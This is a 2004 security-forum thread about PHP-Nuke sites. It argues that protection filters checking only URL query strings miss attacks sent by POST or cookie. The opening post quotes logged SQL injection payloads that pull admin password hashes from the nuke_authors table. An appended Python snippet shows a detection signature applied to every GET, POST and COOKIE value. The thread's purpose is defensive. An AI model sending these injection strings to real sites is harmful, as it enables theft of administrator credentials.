Waraxe IT Security Portal
Caution, fortress & co are useless
Posted: Sun Jun 06, 2004 10:11 am
Tora
Regular user
Joined: May 19, 2004
Posts: 9
Location: Germany

Here are 3 examples from our detection log files:
Quote:
request:
_GET[name] = Encyclopedia
_POST[file] = search
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Encyclopedia
REQUEST_URI: /modules.php?name=Encyclopedia
Quote:
request:
_GET[name] = Journal
_POST[file] = search
_POST[disp] = search
_POST[bywhat] = aid
_POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Journal
REQUEST_URI: /modules.php?name=Journal
Quote:
request:
_GET[name] = FAQ
_POST[myfaq] = yes
_POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=FAQ
REQUEST_URI: /modules.php?name=FAQ

As you can see, the hackers do not attack over the URL. They dispatch the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.

Here is a critical report on an older version of fortress. In addition, most of what is described applies to the new version.
http://vkp.shiba.de/doku/fortress.htm
Sorry, only in German...

Best wishes and greetings from Germany
Andi (aka Tora)


Last edited by Tora on Mon Jun 07, 2004 12:09 am; edited 1 time in total

Posted: Sun Jun 06, 2004 11:16 am
SteX
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia

I never installed that shits of protect .. :)

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------

Posted: Sun Jun 06, 2004 2:36 pm
LINUX
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman

Quote:
As you can see, the hackers do not attack over the URL. They dispatch the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.

Script Kiddie


A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability

Posted: Sun Jun 06, 2004 4:00 pm
Tora
Regular user
Joined: May 19, 2004
Posts: 9
Location: Germany

Quote:
Script Kiddie

:?: :?: Who is the script kiddie :?: :?:

_________________
Greetings from Germany
Andi aka Tora, SiteAdmin @ pragmamx.org pragmaMx developer-team

Posted: Sun Jun 06, 2004 5:35 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Tora knows the stuff, it's obvious from his posts. Scriptkiddies are beginners who have learned how to USE exploits, but they do not YET fully understand how it works. Tora has, in my opinion, advanced knowledge/skills in phpnuke/mysql and other stuff, he/she is definitely not a scriptkiddie 8) ;)


Re: Caution, fortress & co are useless
Posted: Sun Jun 06, 2004 5:39 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Yes, you are absolutely right - sanitizing only the GET parameters/QUERY string is useless, and POST and COOKIE variables must be sanitized too. Because phpnuke globalizes all the GET/POST/COOKIE parameters, it's not hard for an attacker to inject malicious requests through COOKIE, for example...
I suggest using the Sentinel protection system. It's my favorite at the moment and it will add a good security layer between potential attackers and the website.

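The point made in this thread, checked against the log format from the first post, as an added example that is not part of the original posts: a check that reads only QUERY_STRING reports nothing for these requests, while one that walks every GET, POST and COOKIE value flags the field that carried the injection. The second log record, the `example` cookie name and the single UNION SELECT signature are assumptions constructed for the illustration.

```python
import re
from urllib.parse import unquote_plus

# Record 1 is copied from the first post; record 2 is constructed for this example.
SAMPLE_LOG = """\
request:
_GET[name] = Encyclopedia
_POST[file] = search
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Encyclopedia
REQUEST_URI: /modules.php?name=Encyclopedia
request:
_GET[name] = Example
_COOKIE[example] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 192.0.2.10
QUERY_STRING: name=Example
REQUEST_URI: /modules.php?name=Example
"""

VAR = re.compile(r"^_(GET|POST|COOKIE)\[(\w+)\] = (.*)$")
INFO = re.compile(r"^([A-Z_]+): (.*)$")
SQLI = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)  # illustrative signature (assumption)

def parse_log(text):
    # Each "request:" line opens a record; variables and server info follow it.
    records = []
    for line in map(str.strip, text.splitlines()):
        if line == "request:":
            records.append({"vars": [], "server": {}})
        elif records and (m := VAR.match(line)):
            records[-1]["vars"].append(m.groups())  # (source, name, value)
        elif records and (m := INFO.match(line)):
            records[-1]["server"][m.group(1)] = m.group(2)
    return records

def query_string_only(rec):
    # The check the thread criticises: QUERY_STRING and nothing else.
    return bool(SQLI.search(unquote_plus(rec["server"].get("QUERY_STRING", ""))))

def all_sources(rec):
    # Inspect every GET, POST and COOKIE value; return the (source, name) hits.
    return [(src, name) for src, name, val in rec["vars"] if SQLI.search(val)]

def compare(text):  # -> (REQUEST_URI, QUERY_STRING-only hit?, fields hit by full check)
    return [(r["server"]["REQUEST_URI"], query_string_only(r), all_sources(r))
            for r in parse_log(text)]
```
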